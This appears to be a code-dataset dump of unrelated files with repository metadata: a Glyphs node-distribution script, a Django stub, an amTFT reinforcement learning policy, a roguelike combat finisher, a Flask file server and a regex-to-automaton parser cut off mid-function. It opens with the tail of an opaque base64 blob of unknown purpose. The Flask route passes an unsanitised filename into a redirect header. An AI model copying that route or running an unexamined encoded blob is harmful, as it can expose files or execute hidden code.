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"))) | [
"noreply@github.com"
] | SOMii-BRAND.noreply@github.com |
7d8a6721f3bcf3f674d6a94c79772d4af0b6a9be | d9aa084ac5bcfa1ac6976bd7efeea29e49191a4e | /Paths/Distribute Nodes.py | 321092bfb271571d00b99022d74233863015931e | [
"Apache-2.0"
] | permissive | davidtahim/Glyphs-Scripts | a4149cedf5d958e3beb808985f3806c70c9c4f61 | 5ed28805b5fe03c63d904ad2f79117844c22aa44 | refs/heads/master | 2021-01-20T22:59:25.348421 | 2015-02-09T15:38:33 | 2015-02-09T15:38:33 | 30,553,555 | 1 | 0 | null | 2015-02-09T19:19:39 | 2015-02-09T19:19:39 | null | UTF-8 | Python | false | false | 1,352 | py | #MenuTitle: Distribute Nodes
# -*- coding: utf-8 -*-
__doc__="""
Distributes the selected nodes horizontally or vertically, depending on the bounding box.
"""
import GlyphsApp
Font = Glyphs.font
Doc = Glyphs.currentDocument
selectedLayer = Font.selectedLayers[0]
try:
selection = selectedLayer.selection()
selectionXList = [ n.x for n in selection ]
selectionYList = [ n.y for n in selection ]
leftMostX, rightMostX = min( selectionXList ), max( selectionXList )
lowestY, highestY = min( selectionYList ), max( selectionYList )
diffX = abs(leftMostX-rightMostX)
diffY = abs(lowestY-highestY)
Font.disableUpdateInterface()
if diffX > diffY:
increment = diffX // ( len( selection ) - 1 )
sortedSelection = sorted( selection, key=lambda n: n.x)
for thisNodeIndex in range( len( selection ) ):
sortedSelection[thisNodeIndex].x = leftMostX + ( thisNodeIndex * increment )
else:
increment = diffY // ( len( selection ) - 1 )
sortedSelection = sorted( selection, key=lambda n: n.y)
for thisNodeIndex in range( len( selection ) ):
sortedSelection[thisNodeIndex].y = lowestY + ( thisNodeIndex * increment )
Font.enableUpdateInterface()
except Exception, e:
if selection == ():
print "Cannot distribute nodes: nothing selected in frontmost layer."
else:
print "Error. Cannot distribute nodes:", selection
print e
| [
"mekka@mekkablue.com"
] | mekka@mekkablue.com |
cba7b0d6c3b1dda4d96095f7b0420c56c412ab5d | 27398f603af4adad2201774cb2b4a022af0ecdc4 | /articles/views.py | 9c77f6e035b6e1acad1d95c9c8029f15a5aff1c1 | [] | no_license | shubhamsingh782/PAC | e4637db3d52974830cfd0eae51ae016faea5c397 | 5c41ab19d33e83f2b378ad9c270ac7ca6c4e8532 | refs/heads/master | 2021-01-23T03:12:53.560326 | 2017-05-28T11:42:10 | 2017-05-28T11:42:10 | 86,058,125 | 1 | 1 | null | 2017-03-29T09:19:50 | 2017-03-24T10:51:24 | JavaScript | UTF-8 | Python | false | false | 148 | py | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
return HttpResponse("hello") | [
"tantric.singh73@gmail.com"
] | tantric.singh73@gmail.com |
0e4b8dce20b157e2b87c8519304573892e8f70cd | 240adb6a22740b0f8a9ec50a52b8d10c77011435 | /submission/algos/amTFT/base_policy.py | 6290e61b1278df708662a53dd429350ad4d47527 | [] | no_license | 68545324/anonymous | 5541eed64af2d9f1cbe109d4fdd22548b260c726 | 048e28b16f68b74ddaf41f8a51aa762735475a9b | refs/heads/main | 2023-08-15T05:30:49.428378 | 2021-09-24T11:05:17 | 2021-09-25T22:16:39 | 409,931,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,107 | py | import copy
import logging
from typing import Dict, TYPE_CHECKING
import numpy as np
import torch
from ray.rllib.env import BaseEnv
from ray.rllib.evaluation import MultiAgentEpisode
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils import override
from ray.rllib.utils.threading import with_lock
from ray.rllib.utils.torch_ops import (
convert_to_torch_tensor,
)
from ray.rllib.utils.typing import PolicyID
if TYPE_CHECKING:
from ray.rllib.evaluation import RolloutWorker
from submission.algos import hierarchical
from submission.algos.amTFT.weights_exchanger import WeightsExchanger
from submission.utils import postprocessing, restore, callbacks
from submission.algos.amTFT.base import (
AmTFTReferenceClass,
WORKING_STATES,
WORKING_STATES_IN_EVALUATION,
OPP_COOP_POLICY_IDX,
OWN_COOP_POLICY_IDX,
OWN_SELFISH_POLICY_IDX,
)
logger = logging.getLogger(__name__)
class AmTFTPolicyBase(
hierarchical.HierarchicalTorchPolicy, WeightsExchanger, AmTFTReferenceClass
):
def __init__(self, observation_space, action_space, config, **kwargs):
super().__init__(observation_space, action_space, config, **kwargs)
self.total_debit = 0
self.n_steps_to_punish = 0
self.observed_n_step_in_current_epi = 0
self.last_own_algo_idx_in_eval = OWN_COOP_POLICY_IDX
self.opp_previous_obs = None
self.opp_new_obs = None
self.own_previous_obs = None
self.own_new_obs = None
self.both_previous_raw_obs = None
self.both_new_raw_obs = None
self.coop_own_rnn_state_before_last_act = None
self.coop_opp_rnn_state_before_last_act = None
# notation T in the paper
self.debit_threshold = config["debit_threshold"]
# notation alpha in the paper
self.punishment_multiplier = config["punishment_multiplier"]
self.working_state = config["working_state"]
assert (
self.working_state in WORKING_STATES
), f"self.working_state {self.working_state}"
self.verbose = config["verbose"]
self.welfare_key = config["welfare_key"]
self.auto_load_checkpoint = config.get("auto_load_checkpoint", True)
self.punish_instead_of_selfish = config.get(
"punish_instead_of_selfish", False
)
self.punish_instead_of_selfish_key = (
postprocessing.OPPONENT_NEGATIVE_REWARD
)
if self.working_state in WORKING_STATES_IN_EVALUATION:
self._set_models_for_evaluation()
if (
self.auto_load_checkpoint
and restore.LOAD_FROM_CONFIG_KEY in config.keys()
):
print("amTFT going to load checkpoint")
restore.before_loss_init_load_policy_checkpoint(self)
def _set_models_for_evaluation(self):
for algo in self.algorithms:
algo.model.eval()
@with_lock
@override(hierarchical.HierarchicalTorchPolicy)
def _compute_action_helper(
self, input_dict, state_batches, seq_lens, explore, timestep
):
state_batches = self._select_witch_algo_to_use(state_batches)
self._track_last_coop_rnn_state(state_batches)
actions, state_out, extra_fetches = super()._compute_action_helper(
input_dict, state_batches, seq_lens, explore, timestep
)
if self.verbose > 1:
print("algo idx", self.active_algo_idx, "action", actions)
print("extra_fetches", extra_fetches)
print("state_batches (in)", state_batches)
print("state_out", state_out)
return actions, state_out, extra_fetches
def _select_witch_algo_to_use(self, state_batches):
if (
self.working_state == WORKING_STATES[0]
or self.working_state == WORKING_STATES[4]
):
self.active_algo_idx = OWN_COOP_POLICY_IDX
elif (
self.working_state == WORKING_STATES[1]
or self.working_state == WORKING_STATES[3]
):
self.active_algo_idx = OWN_SELFISH_POLICY_IDX
elif self.working_state == WORKING_STATES[2]:
state_batches = self._select_algo_to_use_in_eval(state_batches)
else:
raise ValueError(
f'config["working_state"] ' f"must be one of {WORKING_STATES}"
)
return state_batches
def _select_algo_to_use_in_eval(self, state_batches):
if self.n_steps_to_punish == 0:
self.active_algo_idx = OWN_COOP_POLICY_IDX
elif self.n_steps_to_punish > 0:
self.active_algo_idx = OWN_SELFISH_POLICY_IDX
self.n_steps_to_punish -= 1
else:
raise ValueError("self.n_steps_to_punish can't be below zero")
state_batches = self._check_for_rnn_state_reset(
state_batches, "last_own_algo_idx_in_eval"
)
return state_batches
def _check_for_rnn_state_reset(self, state_batches, last_algo_idx: str):
if getattr(self, last_algo_idx) != self.active_algo_idx:
state_batches = self._get_initial_rnn_state(state_batches)
self._to_log["reset_rnn_state"] = self.active_algo_idx
setattr(self, last_algo_idx, self.active_algo_idx)
if self.verbose > 0:
print("reset_rnn_state")
else:
if "reset_rnn_state" in self._to_log.keys():
self._to_log.pop("reset_rnn_state")
return state_batches
def _get_initial_rnn_state(self, state_batches):
if "model" in self.config.keys() and self.config["model"]["use_lstm"]:
initial_state = self.algorithms[
self.active_algo_idx
].get_initial_state()
initial_state = [
convert_to_torch_tensor(s, self.device) for s in initial_state
]
initial_state = [s.unsqueeze(0) for s in initial_state]
msg = (
f"self.active_algo_idx {self.active_algo_idx} "
f"state_batches {state_batches} reset to initial rnn state"
)
# print(msg)
logger.info(msg)
return initial_state
else:
return state_batches
def _track_last_coop_rnn_state(self, state_batches):
if self.active_algo_idx == OWN_COOP_POLICY_IDX:
self.coop_own_rnn_state_before_last_act = state_batches
@override(hierarchical.HierarchicalTorchPolicy)
def _learn_on_batch(self, samples: SampleBatch):
if self.working_state == WORKING_STATES[0]:
algo_idx_to_train = OWN_COOP_POLICY_IDX
elif self.working_state == WORKING_STATES[1]:
algo_idx_to_train = OWN_SELFISH_POLICY_IDX
else:
raise ValueError(
f"self.working_state must be one of " f"{WORKING_STATES[0:2]}"
)
samples = self._modify_batch_for_policy(algo_idx_to_train, samples)
algo_to_train = self.algorithms[algo_idx_to_train]
learner_stats = {"learner_stats": {}}
learner_stats["learner_stats"][
f"algo{algo_idx_to_train}"
] = algo_to_train.learn_on_batch(samples)
if self.verbose > 1:
print(f"learn_on_batch WORKING_STATES " f"{self.working_state}")
return learner_stats
def _modify_batch_for_policy(self, algo_idx_to_train, samples):
if algo_idx_to_train == OWN_COOP_POLICY_IDX:
samples = samples.copy()
samples = self._overwrite_reward_for_policy_in_use(
samples, self.welfare_key
)
elif (
self.punish_instead_of_selfish
and algo_idx_to_train == OWN_SELFISH_POLICY_IDX
):
samples = samples.copy()
samples = self._overwrite_reward_for_policy_in_use(
samples, self.punish_instead_of_selfish_key
)
return samples
def _overwrite_reward_for_policy_in_use(self, samples_copy, welfare_key):
samples_copy[samples_copy.REWARDS] = np.array(
samples_copy.data[welfare_key]
)
logger.debug(f"overwrite reward with {welfare_key}")
return samples_copy
def on_observation_fn(self, own_new_obs, opp_new_obs, both_new_raw_obs):
# Episode provide the last action with the given last
# observation produced by this action. But we need the
# observation that cause the agent to play this action
# thus the observation n-1
if self.own_new_obs is not None:
self.own_previous_obs = self.own_new_obs
self.opp_previous_obs = self.opp_new_obs
self.both_previous_raw_obs = self.both_new_raw_obs
self.own_new_obs = own_new_obs
self.opp_new_obs = opp_new_obs
self.both_new_raw_obs = both_new_raw_obs
def on_episode_step(
self,
policy_id,
policy,
policy_ids,
episode,
worker,
base_env,
env_index,
*args,
**kwargs,
):
opp_obs, raw_obs, opp_a = self._get_information_from_opponent(
policy_id, policy_ids, episode
)
# Ignored the first step in epi because the
# actions provided are fake (they were not played)
self._on_episode_step(
opp_obs, raw_obs, opp_a, worker, base_env, episode, env_index
)
self.observed_n_step_in_current_epi += 1
def _get_information_from_opponent(self, agent_id, agent_ids, episode):
opp_agent_id = [one_id for one_id in agent_ids if one_id != agent_id][
0
]
opp_a = episode.last_action_for(opp_agent_id)
return self.opp_previous_obs, self.both_previous_raw_obs, opp_a
def _on_episode_step(
self,
opp_obs,
last_obs,
opp_action,
worker,
base_env,
episode,
env_index,
):
if self.working_state == WORKING_STATES[2]:
if self._is_punishment_planned():
self._to_log["punishing"] = True
# self.n_steps_to_punish -= 1 Must not be here to allow
# to use n_steps_to_punish during rollouts
# during which on_episode_step is not called
if self.verbose > 0:
print(
f"punishing self.n_steps_to_punish: "
f"{self.n_steps_to_punish}"
)
else:
self._to_log["punishing"] = False
coop_opp_simulated_action = (
self._simulate_action_from_cooperative_opponent(opp_obs)
)
assert (
len(worker.async_env.env_states) == 1
), "amTFT in eval only works with one env not vector of envs"
assert (
worker.env.step_count_in_current_episode
== worker.async_env.env_states[
0
].env.step_count_in_current_episode
)
assert (
worker.env.step_count_in_current_episode
== self._base_env_at_last_step.get_unwrapped()[
0
].step_count_in_current_episode
+ 1
)
self._update_total_debit(
last_obs,
opp_action,
worker,
self._base_env_at_last_step,
episode,
env_index,
coop_opp_simulated_action,
)
if self._is_starting_new_punishment_required():
self._plan_punishment(
opp_action, coop_opp_simulated_action, worker, last_obs
)
self._base_env_at_last_step = copy.deepcopy(base_env)
self._to_log["n_steps_to_punish"] = self.n_steps_to_punish
self._to_log["debit_threshold"] = self.debit_threshold
def _is_punishment_planned(self):
return self.n_steps_to_punish > 0
def on_episode_start(self, *args, **kwargs):
if self.working_state in WORKING_STATES_IN_EVALUATION:
self._base_env_at_last_step = copy.deepcopy(kwargs["base_env"])
self.last_own_algo_idx_in_eval = OWN_COOP_POLICY_IDX
self.coop_opp_rnn_state_after_last_act = self.algorithms[
OPP_COOP_POLICY_IDX
].get_initial_state()
def _simulate_action_from_cooperative_opponent(self, opp_obs):
if self.verbose > 1:
print("opp_obs for opp coop simu nonzero obs", np.nonzero(opp_obs))
for i, algo in enumerate(self.algorithms):
print("algo", i, algo)
self.coop_opp_rnn_state_before_last_act = (
self.coop_opp_rnn_state_after_last_act
)
(
coop_opp_simulated_action,
self.coop_opp_rnn_state_after_last_act,
coop_opp_extra_fetches,
) = self.algorithms[OPP_COOP_POLICY_IDX].compute_single_action(
obs=opp_obs,
state=self.coop_opp_rnn_state_after_last_act,
)
if self.verbose > 1:
print(
coop_opp_simulated_action,
"coop_opp_extra_fetches",
coop_opp_extra_fetches,
)
print(
"state before simu coop opp",
self.coop_opp_rnn_state_before_last_act,
)
print(
"state after simu coop opp",
self.coop_opp_rnn_state_after_last_act,
)
return coop_opp_simulated_action
def _update_total_debit(
self,
last_obs,
opp_action,
worker,
base_env,
episode,
env_index,
coop_opp_simulated_action,
):
if self.verbose > 1:
print(
self.own_policy_id,
self.config[restore.LOAD_FROM_CONFIG_KEY][0].split("/")[-5],
)
if coop_opp_simulated_action != opp_action:
if self.verbose > 0:
print(
self.own_policy_id,
"coop_opp_simulated_action != opp_action:",
coop_opp_simulated_action,
opp_action,
)
if (
worker.env.step_count_in_current_episode
>= worker.env.max_steps
):
debit = 0
else:
debit = self._compute_debit(
last_obs,
opp_action,
worker,
base_env,
episode,
env_index,
coop_opp_simulated_action,
)
else:
if self.verbose > 0:
print(
"id",
self.own_policy_id,
"coop_opp_simulated_action == opp_action",
)
debit = 0
tmp = self.total_debit
self.total_debit += debit
self._to_log["debit_this_step"] = debit
self._to_log["total_debit"] = self.total_debit
self._to_log["summed_debit"] = (
debit + self._to_log["summed_debit"]
if "summed_debit" in self._to_log
else debit
)
if coop_opp_simulated_action != opp_action:
if self.verbose > 0:
print(f"debit {debit}")
print(
f"self.total_debit {self.total_debit}, previous was {tmp}"
)
if self.verbose > 0:
print("_update_total_debit")
print(" debit", debit)
print(" self.total_debit", self.total_debit)
print(" self.summed_debit", self._to_log["summed_debit"])
print(" self.performing_rollouts", self.performing_rollouts)
print(" self.use_opponent_policies", self.use_opponent_policies)
def _is_starting_new_punishment_required(self, manual_threshold=None):
if manual_threshold is not None:
return self.total_debit >= manual_threshold
return self.total_debit >= self.debit_threshold
def _plan_punishment(
self, opp_action, coop_opp_simulated_action, worker, last_obs
):
if worker.env.step_count_in_current_episode >= worker.env.max_steps:
self.n_steps_to_punish = 0
else:
self.n_steps_to_punish = self._compute_punishment_duration(
opp_action, coop_opp_simulated_action, worker, last_obs
)
self.total_debit = 0
self._to_log["n_steps_to_punish"] = self.n_steps_to_punish
self._to_log["summed_n_steps_to_punish"] = (
self.n_steps_to_punish + self._to_log["summed_n_steps_to_punish"]
if "summed_n_steps_to_punish" in self._to_log
else self.n_steps_to_punish
)
if self.verbose > 0:
print(f"reset self.total_debit to 0 since planned punishement")
def on_episode_end(self, *args, **kwargs):
self._defensive_check_observed_n_opp_moves(*args, **kwargs)
self._if_in_eval_reset_debit_and_punish()
def _defensive_check_observed_n_opp_moves(self, *args, **kwargs):
if self.working_state in WORKING_STATES_IN_EVALUATION:
assert (
self.observed_n_step_in_current_epi
== kwargs["base_env"].get_unwrapped()[0].max_steps
), (
"Each epi, LTFT must observe the opponent each step. "
f"Observed {self.observed_n_step_in_current_epi} times for "
f"{kwargs['base_env'].get_unwrapped()[0].max_steps} "
"steps per episodes."
)
self.observed_n_step_in_current_epi = 0
def _if_in_eval_reset_debit_and_punish(self):
if self.working_state in WORKING_STATES_IN_EVALUATION:
self.total_debit = 0
self.n_steps_to_punish = 0
if self.verbose > 0:
logger.info(
"reset self.total_debit to 0 since end of " "episode"
)
def _compute_debit(
self,
last_obs,
opp_action,
worker,
base_env,
episode,
env_index,
coop_opp_simulated_action,
):
raise NotImplementedError()
def _compute_punishment_duration(
self, opp_action, coop_opp_simulated_action, worker, last_obs
):
raise NotImplementedError()
def _get_last_rnn_states_before_rollouts(self):
if self.config["model"]["use_lstm"]:
return {
self.own_policy_id: self._squeezes_rnn_state(
self.coop_own_rnn_state_before_last_act
),
self.opp_policy_id: self.coop_opp_rnn_state_before_last_act,
}
else:
return None
@staticmethod
def _squeezes_rnn_state(state):
return [
s.squeeze(0)
if torch and isinstance(s, torch.Tensor)
else np.squeeze(s, 0)
for s in state
]
class AmTFTCallbacks(callbacks.PolicyCallbacks):
def on_train_result(self, trainer, *args, **kwargs):
"""
We only call this method one time for both policies in training.
"""
local_policy_map = trainer.workers.local_worker().policy_map
assert len(local_policy_map) == 2
one_policy_id = list(local_policy_map.keys())[0]
self._call_method_from_policy(
*args,
worker=trainer.workers.local_worker(),
method="on_train_result",
policy=local_policy_map[one_policy_id],
policy_id=one_policy_id,
trainer=trainer,
**kwargs,
)
def observation_fn(
agent_obs,
worker: "RolloutWorker",
base_env: BaseEnv,
policies: Dict[PolicyID, Policy],
episode: MultiAgentEpisode,
):
agent_ids = list(policies.keys())
assert len(agent_ids) == 2, "amTFT Implemented for 2 players"
for agent_id, policy in policies.items():
if isinstance(policy, AmTFTReferenceClass):
opp_agent_id = [
one_id for one_id in agent_ids if one_id != agent_id
][0]
both_raw_obs = agent_obs
own_raw_obs = agent_obs[agent_id]
filtered_own_obs = postprocessing.apply_preprocessors(
worker, own_raw_obs, agent_id
)
opp_raw_obs = agent_obs[opp_agent_id]
filtered_opp_obs = postprocessing.apply_preprocessors(
worker, opp_raw_obs, opp_agent_id
)
policy.on_observation_fn(
own_new_obs=copy.deepcopy(filtered_own_obs),
opp_new_obs=copy.deepcopy(filtered_opp_obs),
both_new_raw_obs=copy.deepcopy(both_raw_obs),
)
return agent_obs
| [
"maxime_riche@hotmail.fr"
] | maxime_riche@hotmail.fr |
0de765120183e963c96ef35cf7a5098d79f772b4 | 21e5825959a886787a3915ff0d3efa86d9cd3702 | /combat/finishers/impale.py | 7b32166eb2c800a2409971f38f6bb0c6ea4ef7f5 | [
"MIT"
] | permissive | ChrisLR/Python-Roguelike-Template | e0df37752907377e606197f2469fda61202129d5 | 9b63742b0111c7e9456fb98a96a3cd28d41a1e10 | refs/heads/master | 2021-06-26T07:48:39.215338 | 2017-09-14T21:46:08 | 2017-09-14T21:46:08 | 69,761,175 | 0 | 0 | null | 2017-09-14T21:46:09 | 2016-10-01T20:09:24 | Python | UTF-8 | Python | false | false | 2,188 | py | from combat.enums import DamageType
from combat.finishers.base import Finisher
from echo import functions
from util import gridhelpers
class Impale(Finisher):
name = "Impale"
description = "Impale your enemy with a slashing or piercing weapon."
attacker_message = "You impale {defender}'s {defender_bodypart} with your {attacker_weapon}"
observer_message = "{attacker} impales {defender} {defender_bodypart} with {attacker_his} {attacker_weapon}"
@classmethod
def evaluate(cls, attack_result):
if attack_result.context.distance_to <= 1:
attacker_weapon = attack_result.context.attacker_weapon
if attacker_weapon and hasattr(attacker_weapon, 'weapon'):
weapon_component = attacker_weapon.weapon
if weapon_component:
if weapon_component.melee_damage_type in (DamageType.Pierce, DamageType.Slash):
return True
return False
@classmethod
def execute(cls, attack_result):
return cls.get_message(attack_result)
@classmethod
def get_message(cls, attack_result):
attacker = attack_result.context.attacker
defender = attack_result.context.defender
attacker_weapon = attack_result.context.attacker_weapon
if attacker.is_player:
message = cls.attacker_message.format(
defender=defender.name,
defender_bodypart=attack_result.body_part_hit.name,
attacker_weapon=attacker_weapon.name,
)
else:
message = cls.observer_message.format(
attacker=functions.get_name_or_string(attacker),
defender=functions.names_or_your(defender),
defender_bodypart=attack_result.body_part_hit.name,
attacker_his=functions.his_her_it(attacker),
attacker_weapon=attacker_weapon.name
)
if defender.body.blood:
message += " splashing {blood} behind {defender_him}!!\n".format(
blood=defender.body.blood.name,
defender_him=functions.him_her_it(defender)
)
return message
| [
"arzhul@gmail.com"
] | arzhul@gmail.com |
c3e17d7f707e9ee568efd0dd01e59616bf2aa804 | 0b53c1ff4ac0f12db39da5661d26ffb0a387f909 | /web/ients_doc.py | 4bcb68489597806c7896cb10b6b93f47b9040383 | [] | no_license | summer93/ients-doc | 4ee3d812b3c007c28ab9c6cb72d87d10219ebc1b | e3b4215035c6cafcf81eafeb9510c8d5612090b6 | refs/heads/master | 2020-04-04T09:37:33.072383 | 2018-11-02T09:00:31 | 2018-11-02T09:00:31 | 155,825,205 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | from flask import Flask, make_response, send_file,request
from werkzeug.utils import secure_filename
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
arg = True
@app.route('/static/<filename>')
def upload_file(filename):
if arg:
response = make_response()
response.headers['X-Accel-Redirect'] = '/data/{}'.format(filename)
return response
else:
return 'no!no!no!'
if __name__ == '__main__':
app.run(debug=True)
| [
"root@centos-linux-summer.shared"
] | root@centos-linux-summer.shared |
ab4ff441c01cd8cee45358629d43934c66624e27 | c34198adb832f1338c9dbd99d7620c03246cd367 | /classes/Parser.py | a546fcc9cb0cc245a0c798deaecd2b8950cc5b33 | [] | no_license | frostyhue/Finite_State_Automata | 7b63fe04c3be46b642c427ecc2cae049677e3ea9 | cd039d16e2a85b010774b46e282c8e015d9cfcb1 | refs/heads/master | 2020-04-07T08:59:06.368810 | 2019-01-29T23:45:53 | 2019-01-29T23:45:53 | 158,235,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,934 | py | from classes.Lexer import *
from classes.Transition import *
from classes.State import *
from classes.Operations import *
###############################################################################
# #
# PARSER #
# #
###############################################################################
class Parser(object):
def __init__(self, lexer):
self.current_token = ''
self.tokens_list = []
self.lexer = lexer
self.states = []
self.transitions = []
self.alphabet = []
self.initial_state = ''
self._state_number = 0
self.states = []
self.transitions = []
# Method that raises and error.
def error(self, type_got):
raise Exception('Token type {type} expected, received {type_got}!'.format(type=self.current_token.type, type_got=type_got))
# Method that goes to the next token if the current one has already been processed.
def pop_token(self, token_type):
if self.current_token.type == token_type:
if not self.lexer.expr_end():
self.current_token = self.lexer.token_next()
else:
self.error(token_type)
def find_state_change_final(self, state_name):
for state in self.states:
if state.state_name == state_name:
state.final = True
def process_statement(self):
token = self.current_token
if token.type == RESERVED:
if token.value == 'alphabet:':
self.pop_token(RESERVED)
while self.current_token.type == LETTER_SMALL:
self.alphabet.append(self.current_token)
if self.lexer.expr_end():
break
self.pop_token(LETTER_SMALL)
elif token.value == 'states:':
self.pop_token(RESERVED)
while self.current_token.type == LETTER_CAPITAL:
self.states.append(State(name=self.current_token.value))
if self.lexer.expr_end():
break
self.pop_token(LETTER_CAPITAL)
if self.current_token.type == COMMA:
self.pop_token(COMMA)
elif token.value == 'final:':
self.pop_token(RESERVED)
while self.current_token.type == LETTER_CAPITAL:
self.find_state_change_final(self.current_token.value)
if self.lexer.expr_end():
break
self.pop_token(LETTER_CAPITAL)
if self.current_token.type == COMMA:
self.pop_token(COMMA)
elif token.value == 'transitions:':
self.pop_token(RESERVED)
while not self.current_token.value == 'end.':
origin = self.current_token.value
if type(self.initial_state) == str:
for state in self.states:
if state.state_name == origin:
self.initial_state = state
self.pop_token(LETTER_CAPITAL)
self.pop_token(COMMA)
edge = self.current_token.value
if self.current_token.type == LETTER_SMALL:
self.pop_token(LETTER_SMALL)
else:
self.pop_token(UNDERSCORE)
self.pop_token(DASH)
self.pop_token(DASH)
self.pop_token(ANGLE_BRACKET)
destination = self.current_token.value
self.pop_token(LETTER_CAPITAL)
self.transitions.append(Transition(origin=origin, edge=edge, destination=destination))
if self.lexer.expr_end():
break
self.pop_token(RESERVED)
else:
print('Unexpected type!')
def process_regex(self):
token = self.current_token
node = ""
if token.type == LETTER_SMALL:
# probably for assigning an alphabet letter!
# self.pred_list.append(token.value)
node = Letter(self.current_token)
self.pop_token(LETTER_SMALL)
if self.current_token.type == COMMA:
self.pop_token(COMMA)
if self.current_token.type == RPAR:
self.pop_token(RPAR)
return node
# Logic if the current token is a start for repeating the letter.
elif token.type == STAR:
op = Token(type=STAR, value='*')
self.pop_token(STAR)
if self.current_token.type == LPAR:
self.pop_token(LPAR)
node = Repeat(op=op, letter=self.process_regex())
return node
elif token.type == UNDERSCORE:
# Logic if the current token is a start for repeating the letter.
op = Token(type=UNDERSCORE, value=u'\u03B5')
self.pop_token(UNDERSCORE)
if self.current_token.type == LPAR:
self.pop_token(LPAR)
node = ET(symbol=op)
return node
# Logic if the current token is one of the Contingency operators.
elif token.type in (DOT, PIPE):
if token.type == DOT:
op = Token(type=DOT, value='.')
elif token.type == PIPE:
op = Token(type=PIPE, value='|')
self.pop_token(token.type)
self.pop_token(LPAR)
node = TransitionOp(left=self.process_regex(), op=op, right=self.process_regex())
return node
# Logic if the current token is a right parentheses.
elif token.type == RPAR:
self.pop_token(RPAR)
node = self.process_regex()
return node
# Logic if the current token is a comma.
elif token.type == COMMA:
self.pop_token(COMMA)
node = self.process_regex()
return node
return node
def regex_nfa(self, _expression):
self.new_expression(_expression)
self.initial_state = self.parse_nfa()[0]
return self.states, self.transitions
def parse_nfa(self):
token = self.current_token
# the base condition where the next token is a letter or underscore
if token.type in (LETTER_SMALL, UNDERSCORE):
state = State('S' + str(self._state_number))
self._state_number += 1
letter = self.current_token.value
self.pop_token(LETTER_SMALL)
if self.current_token.type == COMMA:
self.pop_token(COMMA)
if self.current_token.type == RPAR:
self.pop_token(RPAR)
return state, letter
# if the current operation is from a to b aka Dot
elif token.type == DOT:
self.pop_token(DOT)
self.pop_token(LPAR)
# if first param is a letter
if self.current_token.type in (LETTER_SMALL, STAR):
not_star = False
if not self.current_token.type == STAR:
not_star = True
